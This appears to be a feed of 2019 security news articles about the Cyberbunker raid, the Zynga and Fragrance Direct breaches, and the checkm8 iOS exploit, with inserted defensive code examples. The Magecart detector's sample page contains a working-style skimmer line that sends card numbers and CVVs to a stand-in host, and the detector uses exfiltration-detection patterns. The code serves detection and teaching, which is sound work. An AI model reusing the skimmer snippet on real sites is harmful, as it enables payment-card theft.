STE WILLIAMS

600 armed German cops storm Cyberbunker hosting biz on illegal darknet market claims

Cops have seized the physical premises and servers of the Dutch-German ISP that once hosted The Pirate Bay – after storming the hosting biz’s ex-NATO bunker hideout with 600 gunmen.

Cyberbunker, aka CB3ROB, was shut down by German police in what appears to be a military-grade operation targeting the hosting firm’s Traben-Trarbach premises: a Cold War-era bunker complete with its original anti-intrusion defences.

“Police officers succeeded in penetrating the building, a 5,000-square-metre former NATO bunker with iron doors, which goes five floors deep underground,” reported broadcaster Deutsche Welle (DW).

The bunker is around 96km (60 miles) west of Frankfurt.

CB3ROB has a reasonably long history of providing hosting services to what the rest of the world might regard as the murkier ends of the internet. If German police and prosecutors are to be believed, at the time of the raid CB3ROB was hosting several darknet souks, including ones themed around the sale of “drugs, weapons, counterfeit documents and stolen data” as well as allegedly hosting “sites distributing child [sex abuse material]”.

The holding page currently at www.cb3rob.org


DW added: “In the raid, police seized 200 servers along with documents, cellphones and large quantities of cash.”

Thirteen people were arrested in the raid last week, made public over the weekend, with their ages ranging between 20 and 59. Police had named none of them at the time of writing.

Over on the Facebook page (Facebook account required to view; posts are public) of CB3ROB head honcho Sven Olaf Kamphuis, the news of the raid didn’t go down well.

Kamphuis described the raid as an “act of war”, going on to say: “ISPs do not need to know who the customer is, ISPs do not need to know what the customer does (and even if they do know, it doesn’t make them liable – as long as there is no ACTIVE cooperation in the activity).”

German law says ISPs cannot be held liable for the activities of their customers unless, roughly speaking, they actively collude in it. Kamphuis also posted a lengthy history of CB3ROB, which appears to have been machine-translated into English; he appears to be claiming that the bunker was some kind of independent nation state and that he is actually called HRH Prince Sven Olaf of CyberBunker-Kamphuis.

The 600-strong police operation to storm the bunker and arrest everyone in it reportedly included forces from GSG 9, Germany’s federal paramilitary police unit.

CB3ROB was most well known to Reg readers around a decade ago when it was slapped with an injunction from the Motion Picture Association of America forcing it to stop hosting The Pirate Bay, the notorious copyright-breaching torrent site.

A little later, CB3ROB was caught up in the fallout from the infamous Spamhaus DDoS attack. Dutch ISP A2B Internet complained to local police after Spamhaus, an anti-spam project at its heart, allegedly “blackmailed” the company into dropping BGP routes for CB3ROB’s traffic. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/09/30/cyberbunker_cb3rob_germany_police_raid/

8 Microsegmentation Pitfalls to Avoid

Don’t fall victim to these common mistakes on the path to developing better security boundaries and limiting the blast radius of security incidents.

Image Source: Adobe

The practice of microsegmentation takes the principles of least privilege to their logical conclusion by atomizing the isolating techniques of network segmentation. Security architects use microsegmentation to create security boundaries that can extend all the way into individual workloads by controlling East-West, or server-to-server, traffic flows between applications. The bulkheads put up through microsegmentation make it possible to better limit lateral movement of attackers, even in a cloudy world with no perimeter.

But the practice can be tricky to get right, and many experts warn that the journey to effective microsegmentation is fraught with pitfalls. Here are a few suggestions about how to avoid the mistakes en route to effective microsegmentation.

Ericka Chickowski specializes in coverage of information technology and business innovation. She has focused on information security for the better part of a decade and regularly writes about the security industry as a contributor to Dark Reading.

Article source: https://www.darkreading.com/8-microsegmentation-pitfalls-to-avoid/d/d-id/1335936?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

‘Harvesting Attacks’ & the Quantum Revolution

Stockpiles of stolen information sitting in foreign databases are ready to be exposed the minute there’s a working quantum computer in five to ten years. The time to act is now.

The Information Age replaced industrial equipment with data. Today, data isn’t just information; it’s process and interaction. Software commands robots to build things in factories. Sensors in fields trigger watering when crops are too dry. Code runs power plants. We’re developing smart cars and smart cities. And it’s all connected to the Internet — the Internet of Things.

But with this progress comes a pitfall: the opportunity for nation-state hackers to beat even our best cybersecurity systems, steal everything from source code to aeronautical blueprints, and do damage in the physical world as never before.

Attackers constantly find their way into sensitive networks around the globe. Hackers working for China, Russia, Iran, North Korea, and other nations are doing reconnaissance, stealing data, and hiding backdoors and malware in the networks of US agencies and military contractors, nuclear power plants and dams, banks, and Nasdaq. Russia shut down the Ukraine electric grid two years in a row. The US allegedly attacked Russia’s electric power grid, and a decade ago Stuxnet crippled Iran’s nuclear program. These attacks have affected people’s lives — such as turning Ukrainian cities dark for days. Not only do such attacks put sensitive data and intellectual property at risk, but the chances of an attack that could shut down systems that citizens rely on to survive are only increasing.  

In the cat-and-mouse game between cybersecurity and cybercriminals (nation-state or otherwise), a game-changer is in the near future: quantum computing, which is potentially capable of cracking even the most advanced conventional encryption. The US and China are in a heated race to develop quantum computing, which will revolutionize the industry, particularly in the fields of artificial intelligence, medicine, and scientific modeling.

Alongside these benefits is a danger from quantum computing that most people don’t realize is here, now, even though the quantum computers aren’t ready yet. This is because encrypted information stolen by China from the US government and industry is being stockpiled by China. Cheap data storage and the proliferation of valuable data online increases the feasibility and incentive for long-term storage of even the most solidly encrypted data. This offensive strategy is known as a harvesting attack. Encryption protects everything from classified data to the operations of power plants, water supplies, and financial trading systems. Once quantum computers are available, not only will the most critical data be exposed, but quantum-powered attacks will be able to interfere with important cyber-controlled processes as well. Cloaked secrets will be revealed and physical equipment will be manipulated remotely. 

We Need to Get Moving
It may be too late for much of the data that’s already been intercepted, but we can work to protect more of our data going forward — but only if the government takes this threat seriously.

The National Quantum Initiative Act (NQIA), which was signed into law in December, commits $1.2 billion to fund quantum science and computing efforts over five years to be divided between the National Institute of Standards and Technology (NIST), the Department of Energy (DoE), and the National Science Foundation. None of the money has yet been appropriated. Meanwhile, China is building a $10 billion quantum research lab that is slated to open next year.

The US needs to move quickly and invest in tech companies and startups that aren’t hampered by bureaucracy and are efficient with go-to-market strategies. It can take a decade or more to get research from the lab to the market. The Defense Advanced Research Projects Agency within the DoE has provided grants to independent cybersecurity researchers and startups to develop defenses for smart car security, voting machines, and other areas. Given the implications of crypto-breaking quantum computers for the defense industry, it makes sense for it to fund quantum defense as well.

A number of universities are doing important research and development of quantum computing, including MIT, Harvard, the University of Chicago, the University of Waterloo in Canada, and the University of Cambridge in England. NIST is working on post-quantum cryptography designed to protect against quantum computer attacks. And the DoE is doing great research at Oak Ridge National Laboratory on the use of quantum computing to protect the electric grid, which is potentially the biggest risk we face in a post-quantum world. But we need more researchers tackling all the various problems from more of the best minds and labs around the country. Once the NQIA funding is appropriated some grant money will flow to universities, but it will only be a piece of the overall $1.2 billion. Whatever it is, it needs to be more.

There are some quantum efforts that are in operation today, but they involve hardware as opposed to cryptographic algorithms, which can be broken. The Swiss government has been protecting its national elections with quantum key distribution (QKD), a quantum-based method for preventing the interception of encryption keys, for 12 years. However, here too, China is ahead — with a 2,000-kilometer QKD fiber network and a quantum science satellite that was launched in 2016.

Given what’s at stake — and the stockpiles of stolen information already sitting in foreign databases that will be exposed the minute there’s a working quantum computer — we don’t have time to spare. That is estimated to be five to ten years away, and the quantum clock is ticking.

Throughout his 30-year career, John Prisco has demonstrated success driving revenue growth, implementing operational excellence, and bringing companies such as Triumfant, GeoVantage, and Ridgeway Systems to successful exits. His depth of experience in telecommunications, …

Article source: https://www.darkreading.com/vulnerabilities---threats/harvesting-attacks-and-the-quantum-revolution/a/d-id/1335870?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

218M Words with Friends Players Compromised in Data Breach

The same attacker was reportedly behind the Collection #1 and Collection #2 data dumps earlier this year.

A cybercriminal operating under the alias Gnosticplayers has broken into the Words with Friends database and gained access to 218 million player records, The Hacker News reports.

The popular puzzle game is owned by Zynga, one of the biggest names in the social gaming market with other well-known offerings, including FarmVille, Mafia Wars, and Zynga Poker. Zynga issued a disclosure on September 12 to say some player data may have been obtained by unauthorized parties; now, a new report sheds light on the extent of the security incident.

Gnosticplayers, the same cybercriminal also reportedly behind the Collection #1 and Collection #2 data dumps earlier this year, told The Hacker News he was able to breach a Words with Friends database containing more than 218 million user records. The incident affects players using iOS and Android devices who installed and registered for the game on or before September 2.

A sample of the stolen data revealed the range of user data exposed: names, email addresses, login IDs, hashed and salted passwords, requested password reset tokens, provided phone numbers, Facebook ID if the user had connected, and Zynga account ID, the report states.

The attacker also claims to have accessed information belonging to 7 million players of the also-popular Draw Something game, as well as a game called OMGPOP that is discontinued, The Hacker News found. Exposed data included plaintext passwords.

Read more details here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article.

Article source: https://www.darkreading.com/attacks-breaches/218m-words-with-friends-players-compromised-in-data-breach/d/d-id/1335948?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Microsoft changes encryption, another D-Link bug, phishing dangers, and more

Roundup: Let’s look at some of the latest security news you may have missed this week.

Baltimore ransomware outbreak made worse by bad storage practices

This year’s ransomware infection at the City of Baltimore made headlines, in part because of the eye-popping $18.2m price tag its damage and recovery bills racked up. It turns out that the city’s bad data collection policies are playing a big role in that.

The Baltimore Sun reports that one of the reasons the data loss from the infection was so severe was because many of the important files were being kept locally on the PCs of individual employees, rather than backed up to a central server.

This meant that, as the ransomware infection spread from PC to PC, that data was lost and could not be recovered from a backup server, as should be the case.

“One of the things I’ve learned in my short time here is a great number of Baltimore City employees store entity information on their local computers. And that’s it,” said city auditor Josh Pasch.

Not surprisingly, Baltimore’s City Council and auditors are less than happy to learn of this policy, and the city’s IT department is planning to change it.

CS-Pwn

Online game Counter-Strike: Global Offensive is the target of an RCE bug that could allow gamers to be compromised by a hostile server. CVE-2019-15943 is a memory corruption bug that arises when handling a malformed map file.

In practice, the attacker could set up a server then send connecting players the malformed file. A successful exploit could either crash the game or allow for remote code execution.

Microsoft tweaks encryption settings

The latest update to Windows 10 is bringing a change to the way Microsoft handles encryption.

From now on, Redmond says, the default setting for BitLocker with new hard drives will be software encryption, a more secure method of locking down drives. The setting can be changed, and the policy will not apply to existing drives.

Cloudflare drops week’s worth of new features

Edge network provider Cloudflare is wrapping up its annual birthday week rollout of new features and products. The week saw one new feature released each day.

These include a mobile app called WARP, a new set of browser statistic reports for site owners, a security tool to trap and occupy online bots, and support for HTTP/3.

Cheeky AT&T redirects pentest pings to FBI

AT&T had a bit of explaining to do after researchers discovered that one of its pages contained code that would redirect the traffic generated by pentests to the FBI’s website.

Fortunately, this was spotted before anyone got their door kicked down, and it was written off as a joke from someone in AT&T’s IT department. The redirect has since been taken down.

D-Link storage boxes flagged for arbitrary code execution bug

The research team at CyStack Security in Vietnam has laid claim to the discovery of a critical vulnerability in D-Link’s network-attached storage boxes.

CVE-2019-16057 is a remote command execution vulnerability in the DNS-320 model. The bug was patched on September 11 and was detailed by the team recently.

“While doing some research on network devices we found a command injection vulnerability at the login module of a D-Link DNS-320 device,” CyStack says.

“The flaw exists at a hidden feature called SSL Login, whose required parameter, port, can be poisoned.”

The vulnerability has a CVSS score of 10/10, so you will definitely want to make sure your storage boxes are patched.
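The fix for a poisoned parameter like the one described above is to treat it as a number, not a string, and to never hand it to a shell. Below is an added example, not CyStack’s code and not D-Link’s firmware: it validates a port value strictly, builds the command as an argv list so no shell ever parses user input, and shows the string-concatenation pattern beside it so the difference is visible. The helper path `/usr/local/bin/ssl_login_helper` and the parameter name are hypothetical.

```python
import re
from typing import List

# Hypothetical helper that a login module might launch; the path is invented for this example.
HELPER_PATH = "/usr/local/bin/ssl_login_helper"


def validate_port(raw: str) -> int:
    """Accept only a plain decimal integer in 1..65535; raise ValueError for anything else.

    The regex rejects signs, whitespace, separators and shell metacharacters outright,
    so a value such as "443;x" never reaches int() in the first place.
    """
    if not re.fullmatch(r"[0-9]{1,5}", raw or ""):
        raise ValueError(f"port must be a decimal integer, got {raw!r}")
    port = int(raw)
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range: {port}")
    return port


def unsafe_shell_string(raw_port: str) -> str:
    """The injectable pattern: the untrusted value is spliced into a string that a shell
    would later interpret. Kept here only to contrast with build_helper_argv(); it is never
    executed by this example."""
    return f"{HELPER_PATH} --port {raw_port}"


def build_helper_argv(raw_port: str) -> List[str]:
    """Hardened form: validate first, then return an argv list for subprocess.run(argv).

    Passing a list (and never shell=True) means the value is delivered to the program as a
    single argument; even a validator bug could not turn it into a second command.
    """
    port = validate_port(raw_port)
    return [HELPER_PATH, "--port", str(port)]


def is_accepted(raw_port: str) -> bool:
    """Convenience wrapper for testing: True if the value passes validation."""
    try:
        validate_port(raw_port)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed inputs: one legitimate port and several that a validator must refuse.
    for candidate in ["443", "8443", "443;x", "0", "65536", "+443", " 443"]:
        print(f"{candidate!r:>10} -> accepted={is_accepted(candidate)}")
    print("argv:", build_helper_argv("8443"))
```

To launch the helper for real, call `subprocess.run(build_helper_argv(value), check=True)`; the point is that the argv list is the only thing that ever reaches `subprocess`, and `unsafe_shell_string` exists purely to show what the vulnerable shape looks like.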

Phishing scam imitates Adobe

A Reg reader pointed us to this sysadmin’s report of a phishing scheme that disguises its credential-harvesting fake login pages as legitimate Windows login sites.

Furthering the scheme, the phishing attack seemed to direct through a legitimate Adobe domain.

“I got an alert about a user click on a phishing email. Took a look at the alert and the URI originally looked legit – adobe.com, no problem. But something was still whiffy so I dug deeper,” the admin explained.

“Tested the link – it redirected to a fake Office 365 login page hosted at Windows.net. Holy shit. I tested the URI string from Adobe, and sure enough you can put anything after “p1=” and adobe will redirect you.”

The admin noted the matter was reported to Microsoft and the scammer’s account was deleted. ®
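The admin’s finding above is a classic open redirect: a legitimate domain forwards the visitor to whatever is placed in a query parameter, which lets a phishing link carry a trusted hostname. The following is an added example, not code from The Register, the admin or Adobe: it validates a redirect target against an allow-list (relative paths or approved hosts only) and then classifies redirector URLs of the kind seen in mail-gateway or proxy logs. The hostnames, the allow-list and the sample log lines are constructed; the parameter name `p1` is taken from the admin’s report.

```python
from urllib.parse import parse_qs, urlparse

# Hosts this (hypothetical) site is willing to forward visitors to. Constructed for the example.
ALLOWED_HOSTS = {"example.com", "www.example.com"}


def is_safe_redirect(target: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Return True only if `target` is a site-relative path or points at an allow-listed host.

    Rejects absolute URLs to foreign hosts, scheme-relative URLs ("//host/..."), non-http(s)
    schemes and backslashes, which some browsers normalise to forward slashes.
    """
    if not target or "\\" in target:
        return False
    parsed = urlparse(target)
    if parsed.scheme and parsed.scheme not in ("http", "https"):
        return False
    if parsed.netloc:
        # Absolute or scheme-relative URL: the host must be allow-listed. `hostname` strips
        # userinfo, so "https://www.example.com@other.invalid/" resolves to "other.invalid".
        return (parsed.hostname or "").lower() in allowed_hosts
    # No host component: insist on a leading "/" so the browser stays on this site.
    return target.startswith("/")


def classify_redirect_url(url: str, param: str = "p1") -> str:
    """Pull the redirect target out of query parameter `param` of a full redirector URL and
    label it for triage: 'no-redirect-param', 'safe' or 'open-redirect-abuse'."""
    targets = parse_qs(urlparse(url).query).get(param)
    if not targets:
        return "no-redirect-param"
    return "safe" if is_safe_redirect(targets[0]) else "open-redirect-abuse"


# Constructed sample of clicked URLs, standing in for lines from an email-gateway log.
SAMPLE_LOG = [
    "https://www.example.com/redirect?p1=/account/settings",
    "https://www.example.com/redirect?p1=https://www.example.com/help",
    "https://www.example.com/redirect?p1=https://lookalike-login.invalid/office365",
    "https://www.example.com/redirect?p1=//lookalike-login.invalid/",
    "https://www.example.com/redirect?ref=campaign",
]


def scan_log(lines):
    """Classify every line; returns (url, verdict) pairs for reporting."""
    return [(line, classify_redirect_url(line)) for line in lines]


if __name__ == "__main__":
    for url, verdict in scan_log(SAMPLE_LOG):
        print(f"{verdict:<20} {url}")
```

The same `is_safe_redirect` check belongs in the redirector itself: a server that only forwards to relative paths or approved hosts cannot be used to lend its domain to someone else’s login page, which is the whole value of the trick the admin describes.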


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/09/30/270919_security_roundup/

The Etiquette of Respecting Privacy in the Age of IoT

Is it rude to ask someone to shut off their Alexa? Ask the family who’s written the book on etiquette for nearly 100 years — the descendants of Emily Post herself.

(photo of Emily Post, June 1912. Library of Congress Prints and Photographs division)

Her polite robotic voice pipes up in the background, followed by a giggling human apology. ‘So sorry, that was Alexa responding to something one of us said on the conference call. I’ll go on mute.’ Those of us on the line, who’ve been placed on speakerphone, will no longer hear Alexa (or Siri, or Google)…but, of course, she’ll still hear us.

Some chuckle, and bond over anecdotes about the foibles of their voice-activated digital assistants, just like they do about their toddlers’.

Other people are like me. We scowl and grind our teeth.

We think about privacy violations and security vulnerabilities. Like the couple whose conversation was recorded by an Amazon Echo and sent to a contact of theirs. Or the German Amazon customer whose Alexa recordings, which contained intimate “hair standing on end” personal details, were sent to a stranger. Or Amazon workers tapping into conversations, listening and recording for quality control purposes? Or researchers discovering vulnerabilities that would allow for “skill-squatting” (or voice-squatting) attacks that can turn legitimate commands into malicious executables. Or the vulnerable Google Nest, smart coffee pot or other unknown item that might be lurking in the background.

We wonder what things we might have said over the past 45 minutes, before we knew the recording device was stealthily listening. Did we mention anything sensitive or confidential? Anything that would violate privacy law if it were leaked? Anything that would help attackers write a good spearphishing message or guess our passwords? Or just say something stupid and embarrassing? 

What’s a grumpy, privacy-conscious person meant to do in these situations? Make angry demands, spiked with obscenities and snide comments about the foolishness of anyone who’d invite such spy equipment into their life? 

Well, that feels right. But just in case it isn’t, I decided to consult an expert.

An Etiquette ‘Gold Star’

In 1922, Emily Post wrote the first edition of Etiquette in Society in Business in Politics and at Home. Covering everything from weddings to precisely when and how a gentleman should lift his hat, the book made Post the unofficial arbiter of good manners in America.

Although Emily is no longer with us, the Emily Post Institute has carried on her legacy since 1946. Now led by her great-great-grandchildren Lizzie Post and Daniel Post Senning, the Institute is currently working on the 20th edition of Etiquette.   

Who better to consult about the etiquette of the Internet of Things than the family who has been the authority on etiquette for nearly 100 years?

So last Friday afternoon, sitting alone in my dumb home (not smart home), beside my laptop with the disabled microphone and covered webcam, I called Daniel Post Senning. I picked up my phone—which is equipped with a rose-printed carrying case, five security-related apps, and a dazzling array of ‘no’ and ‘don’t’ privacy settings—and dialed.

I asked if he’d mind if I put him on speakerphone and recorded our conversation. I hit Record only after he gave his approval.

“I am always curious where the next frontier is going to be in etiquette,” said Post Senning. “And this idea of privacy in a world where we’re all carrying these increasingly powerful recording devices both audio and visual … I think it’s a fascinating question.”

The Institute hasn’t yet written official guidance on the topic. (It might be coming in the 20th edition.)

“Whenever I’m in new territory, I always look back to tradition,” says Post Senning. “All the courtesies that survived around conference calls, video calls, using speaker phones, generally would apply in the scenarios where the ‘person’ listening isn’t necessarily a person, but might be artificial intelligence or a device that’s connected to the Internet, in the case of Alexa.”

Therefore, in professional situations like this, says Post Senning, “The idea of letting people know when they’re being recorded and who they’re being broadcast to are, for me, just core courtesies, no matter what technology you’re using.

“And it’s impossible to know every situation you walk into what combination of technology is going to be at play,” he says. “So I think the onus really falls on the person who’s chosen to deploy it in their home to warn others or to let other people know.”

If the owner of the technology fails to extend this courtesy, however, is it rude for a concerned (paranoid) house guest or colleague to ask, or even request they turn the device off?

The short answer, says Post Senning, is no. However, that depends on the way you ask. 

“There are kind and benevolent truths and there are harsh and brutal truths,” says Post Senning. “And if you had that conversation in a way that was accusatory or insulting or even just self-absorbed – ‘I can’t believe you have that device in your house, don’t you know that I don’t like to be listened to by evil tech giants’ – there’s a way to have that conversation that could be really offensive.”

(Baser impulses nearly drove me to such an offensive conversation. Post Senning gave me “an etiquette gold star” for resisting them.)

Reasonable Expectations

We scowling teeth-grinders must recognize, too, that the world need not bend to our whims just because we asked nicely, and our needs are not the only ones that matter.

“Etiquette is most powerful when you’re using it as a tool for self-improvement, self-assessment,” says Post Senning.  

So, etiquette would tell a privacy-conscious guest in a smart-as-a-whip home to also consider carefully what you’re asking of your host. The inconvenience of turning off the microphone of one device might be small, but entirely altering the operation of an entire building (particularly if the homeowner requires voice activation for accessibility purposes) is a far greater inconvenience. “As the practical landscape changes,” says Post Senning, “the nature of the request and how you make it is going to change as well.”

Nevertheless, “It’s hard to make demands of your host, as a guest. But you can make a request, and you can adjust your behavior and your participation accordingly,” says Post Senning. “‘Oh no we’re gonna leave that on? Well I’m just going to talk about things that are tier-1 conversation topics. We’re gonna talk about the weather and sports and pop culture now.’

“Or you say ‘maybe next time I’ll get myself an Air BB.'”

Another very practical piece of advice he gives is to get familiar with all the IoT and communications technology you use in the workplace, because using it well can protect your privacy. (Using it not-well might mean forgetting to hit “stop sharing my screen” before beginning an instant message conversation complaining about the people on the conference call.)

Of course that would be less of an issue if we followed one of the oldest etiquette rules, going, Post Senning says, almost back to Emily’s time: “the headline rule.” The idea was that before you wrote something in a letter, ask yourself if you’d be okay with it becoming a newspaper headline; because even if you trusted the person you were sending the letter to, could you trust everyone else who might obtain access to it?

“As the question about not just what we write, but what we say and what we do becomes also potentially public and permanent,” says Senning, “I think it raises some really interesting questions about what privacy is and how we continue to value it and show value for it in the way we behave and make choices.”

Post Senning says the heart of all good etiquette is holding yourself accountable to standards of consideration, honesty and kindness. In that case, we all ought to practice it. Because if recording devices are going to capture our behavior no matter what we do, good etiquette is behavior we wouldn’t mind being caught. 

Sara Peters is Senior Editor at Dark Reading and formerly the editor-in-chief of Enterprise Efficiency. Prior to that she was senior editor for the Computer Security Institute, writing and speaking about virtualization, identity management, cybersecurity law, and a myriad …

Article source: https://www.darkreading.com/edge/theedge/the-etiquette-of-respecting-privacy-in-the-age-of-iot/b/d-id/1335939?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Got a pre-A12 iPhone? Love jailbreaks? Happy Friday! ‘Unpatchable tethered Boot ROM exploit’ released

A programmer claims to have found a way to execute arbitrary code on recent-ish iPhones and iPads, paving the way for full-blown tethered jailbreaks.

And, we’re told, it is impossible for Apple to block these shenanigans as it involves a vulnerability baked into the devices’ immutable Boot ROM.

Specifically, the coder, who goes by the handle axi0mX, on Friday said they had built checkm8: “A permanent unpatchable bootrom exploit for hundreds of millions of iOS devices … Most generations of iPhones and iPads are vulnerable: from iPhone 4S (A5 chip) to iPhone 8 and iPhone X (A11 chip).”

That means gear using Apple’s A12 system-on-chip, such as the iPhone XS, XS Max, and XR, are immune to checkm8; iPhones and iPads made before 2018 are not, it is claimed.

The exploit is a first stepping stone to properly jailbreaking the aforementioned vulnerable iThings via a USB connection. What’s said to be working exploit code targeting the Boot ROM flaw is now available on GitHub, for research purposes, cough, cough, and a completed suite of software to install whatever suitable operating system and apps you want – Cydia, etc – is expected to follow from the jailbreaking community.

“During iOS 12 betas in summer 2018, Apple patched a critical use-after-free vulnerability in iBoot USB code,” axi0mX said on Twitter, in explaining how they found the bug.

“This vulnerability can only be triggered over USB and requires physical access. It cannot be exploited remotely. I am sure many researchers have seen that patch. That’s how I discovered it. It is likely at least a couple other researchers were able to exploit this vulnerability after discovering the patch. The patch is easy to find, but the vulnerability is not trivial to exploit on most devices.”

They continued:

Jailbreaking, for the uninitiated, is basically installing your own OS and programs on a handheld, circumventing any of the built-in protection mechanisms that lock you inside Apple’s walled garden, in this case.

For those interested, the guts of the use-after-free() exploit are here: it appears to involve connecting the iThing to a computer via USB, forcing the device into DFU mode, and then abusing the USB connection to inject software that the firmware then executes. A payload of code is sent over during this process, meaning this is a tethered attack: you have to hook your gizmo up to a computer to pull off the technique.

While such an exploit will be of great use to hobbyists, it can be used by cops and snoops with physical access to a device to commandeer it and install spyware, though they will need to brute-force the passcode to decrypt any private data already encrypted by iOS.

“Earlier today, a new iPhone Boot ROM exploit, checkm8 (or Apollo or Moonshine), was published on GitHub by axi0mX, affecting the iPhone 4S through the iPhone X,” explained Ryan Stortz, of infosec biz Trail of Bits, in an early analysis of the code.

“The vulnerability was patched in devices with A12 and A13 CPUs. As of this writing, the iPhone XS, XS Max, XR, 11, 11 Pro and 11 Pro Max are all safe from this exploit.

“We strongly urge all journalists, activists, and politicians to upgrade to an iPhone that was released in the past two years with an A12 or higher CPU. All other devices, including models that are still sold — like the iPhone 8, are vulnerable to this exploit. Regardless of your device, we also recommend an alphanumeric passcode, rather than a 6-digit numeric passcode. A strong alphanumeric passcode will protect the data on your phone from this and similar attacks.”

Here’s another summary:

In other Apple news…

Apple did not respond to a request for comment on the matter. The Cupertino phone slinger did, however, post a handful of updates this week to address other flaws in its products.

For phones running iOS 13, Apple patched the lock-screen workaround bug discovered by researcher Jose Rodriguez. On iOS 12 devices, Apple fixed CVE-2019-8641, a remote code execution flaw uncovered by Samuel Groß and Natalie Silvanovich of Google’s Project Zero.

Meanwhile, on the Macintosh, Apple released an update to clean up the same CVE-2019-8641 flaw in Sierra, High Sierra, and Mojave macOS systems. Updates were also dropped for bugs in tvOS (CVE-2019-8704), watchOS (CVE-2019-8641), and Safari (CVE-2019-8654, CVE-2019-8725). ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/09/27/unpatchable_exploit_for_ios/

What’s that smell? Perfume merchant senses the scent of a digital burglary

Online merchant fragrancedirect.co.uk has confirmed a miscreant broke into its systems and made off with a raft of customers’ personal data, including payment card details.

The e-retailer, based in Macclesfield, England, wrote to punters this week to inform them of the digital burglary and the subsequent data leakage.

“We recently discovered that some of our user data may have been compromised as a result of unauthorised access to our website by a malicious third party,” the email states.

The online store then launched an investigation and “quickly identified the root cause and have taken the necessary steps to address the issue”, the note continues.

It added that the data accessed included “Fragrance Direct Username and Password”, along with “Name, Address and Phone Number”, and “Credit and Debit Card Details”.

The obligatory advice to users of changing their password and contacting the bank or card issuer for further advice was then handed out. The email adds:

“We are working closely with the card companies and have retained a digital security firm to assist us with further investigations. We have also informed the relevant regulators and supervisory authorities.

“We are very sorry for any concern or inconvenience this may cause you.”

The Information Commissioner’s Office told us that “Fragrance Direct has reported an incident to us and we will assess the information provided”.

El Reg called Fragrance Direct and spoke to founder and owner Katie Jowle, who told us her company had contacted all people that had their data accessed by “malicious code” during the period in question.

We have asked for details of the code, when it was spotted, how long it had been on the site, and the measures taken to prevent a repeat incident. We will update this article when the business replies. We suspect it was a card-stealing MageCart infection. ®
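The Register's suspicion is a Magecart-style card skimmer. As an added example (not code from the article, and not code from Fragrance Direct), the script below inventories the `<script>` tags in a checkout page and flags the two things such an infection typically introduces: an external script served from an origin outside the operator's allowlist, and an inline script that both references card fields and contains an exfiltration call. The allowlist, the page origin and the sample checkout HTML (including the look-alike hostname `static-anaiytics.example`) are constructed assumptions for the example.

```javascript
// Added example: script inventory for a checkout page, the kind of check used
// to spot Magecart-style skimmers. Not from the article; runs offline on
// constructed HTML.

// Origins the operator expects scripts to load from. Assumption for the
// example; a real allowlist comes from the site's own deployment records.
const ALLOWED_ORIGINS = new Set(["https://shop.example", "https://cdn.example"]);

// Inline-script indicators: a reference to payment fields AND a way to send
// data out. Either alone is common in legitimate code; both together is not.
const CARD_FIELD = /card|cvv|cvc|expir|\bpan\b/i;
const EXFIL_CALL = /fetch\(|XMLHttpRequest|\.send\(|new Image\(|navigator\.sendBeacon/;

// Resolve a src attribute (absolute or relative) to an origin, or null if it
// cannot be parsed at all.
function scriptOrigin(src, pageOrigin) {
  try {
    return new URL(src, pageOrigin).origin;
  } catch (e) {
    return null;
  }
}

// Returns one finding per <script> element, in document order.
function inventoryScripts(html, pageOrigin) {
  const findings = [];
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const attrs = m[1];
    const body = m[2];
    const srcMatch = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(attrs);
    if (srcMatch) {
      const origin = scriptOrigin(srcMatch[1], pageOrigin);
      const allowed = origin !== null && ALLOWED_ORIGINS.has(origin);
      findings.push({
        kind: "external",
        src: srcMatch[1],
        origin,
        suspicious: !allowed,
        reason: allowed ? "" : "origin not in allowlist",
      });
    } else {
      const touchesCard = CARD_FIELD.test(body);
      const exfiltrates = EXFIL_CALL.test(body);
      const suspicious = touchesCard && exfiltrates;
      findings.push({
        kind: "inline",
        origin: pageOrigin,
        suspicious,
        reason: suspicious ? "inline script reads card fields and sends data out" : "",
      });
    }
  }
  return findings;
}

// Only the findings worth a human's attention.
function suspiciousScripts(html, pageOrigin) {
  return inventoryScripts(html, pageOrigin).filter((f) => f.suspicious);
}

// Constructed sample: two legitimate scripts, one look-alike third-party
// loader, one harmless inline snippet, and one inline skimmer.
const SAMPLE_CHECKOUT = `
<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example/jquery.min.js"></script>
<script src="https://static-anaiytics.example/track.js"></script>
<script>
  window.dataLayer = window.dataLayer || [];
</script>
<script>
  document.querySelector("form#checkout").addEventListener("submit", function () {
    var d = { n: document.getElementById("cardNumber").value,
              c: document.getElementById("cvv").value };
    new Image().src = "https://static-anaiytics.example/p.gif?d=" + btoa(JSON.stringify(d));
  });
</script>
</head><body><form id="checkout"></form></body></html>`;

for (const f of suspiciousScripts(SAMPLE_CHECKOUT, "https://shop.example")) {
  console.log(`${f.kind.padEnd(8)} ${f.origin}  ${f.reason}`);
}
```

The check runs on the HTML as served, so it will miss a skimmer that an already-allowlisted script injects at runtime, or one hidden inside a legitimate-looking file on an allowed CDN; compare the inventory against a known-good deployment rather than trusting the allowlist alone, and pair it with a Content-Security-Policy and Subresource Integrity on the checkout pages.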

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/09/27/online_perfume_merchant_hacked/

Cybersecurity Certification in the Spotlight Again

Swiss technology non-profit group joins others, such as the Obama-era President’s Commission, in recommending that certain classes of technology products be tested.

The case for certifying the cybersecurity of specific classes of devices is gaining momentum as cybersecurity professionals worry that the growing number of interdependencies between software, hardware, and online services puts consumers and workers at risk.

